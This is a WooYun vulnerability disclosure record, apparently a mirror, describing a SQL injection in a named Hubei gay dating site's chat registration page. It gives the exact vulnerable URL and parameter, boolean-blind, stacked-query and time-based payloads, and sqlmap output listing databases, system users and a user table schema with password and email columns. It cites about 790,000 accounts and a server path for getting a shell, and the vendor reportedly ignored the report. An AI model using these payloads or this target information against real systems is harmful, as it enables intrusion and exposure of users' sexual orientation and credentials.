乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开
湖北同性恋交友网#碧落星空网某处注入漏洞,泄露大约79万用户信息。。。
注入链接:http://chat.hbblxk.com:8880/register.asp?roomid=1351直接跑出大量的数据。。。。。另外可以读取网站的路径,能够getshell。。。路径: D:\ichat35\iChat_Admin\
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: roomid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: roomid=1351' AND 7316=7316 AND 'GiEK'='GiEK Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: roomid=1351'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: roomid=1351' WAITFOR DELAY '0:0:5'-----[14:44:30] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000available databases [7]:[*] iChatUser[*] mas@er[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbcurrent database: 'iChatUser'current user: 'ichat'[14:45:21] [INFO] retrieved: BUILTIN\Administrators[14:45:40] [INFO] retrieved: ichat[14:45:45] [INFO] retrieved: sadatabase management system users [3]:[*] BUILTIN\\Administrators[*] ichat[*] saDatabase: iChatUser[10 tables]+----------------+| RoomInfo || UserInfe || UserInfo || dt`roperties || reg || sysconstraints || syssegments || wenti || ichat.D99_CMD || ichat.D99_Tmp |+----------------+
available databases [7]:[*] iChatUser[*] mas@er[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbcurrent database: 'iChatUser'current user: 'ichat'[14:45:21] [INFO] retrieved: BUILTIN\Administrators[14:45:40] [INFO] retrieved: ichat[14:45:45] [INFO] retrieved: sadatabase management system users [3]:[*] BUILTIN\\Administrators[*] ichat[*] saDatabase: iChatUser[10 tables]+----------------+| RoomInfo || UserInfe || UserInfo || dt`roperties || reg || sysconstraints || syssegments || wenti || ichat.D99_CMD || ichat.D99_Tmp |+----------------+Database: iChatUserTable: UserInfo[20 columns]+--------------+----------+| Column | Type |+--------------+----------+| CreateDate | datetime || MemberLevel | int || ModifyDate | datetime || UserAnswer | varchar || UserArming | varchar || UserCredit | int || UserEmail | varchar || UserEnable | int || UserIcon | varchar || UserID | int || UserLastIP | varchar || UserLevel | int || UserMsgCount | int || UserName | varchar || UserOicq | varchar || UserPassword | varchar || UserPhoto | varchar || UserQuestion | varchar || UserResume | varchar || UserSex | int |+--------------+----------+[16:41:22] [INFO] resumed: 796999UserMsgCount |796999| 79万用户
跑数据太慢了,就不去跑了。。。
过滤。。
未能联系到厂商或者厂商积极拒绝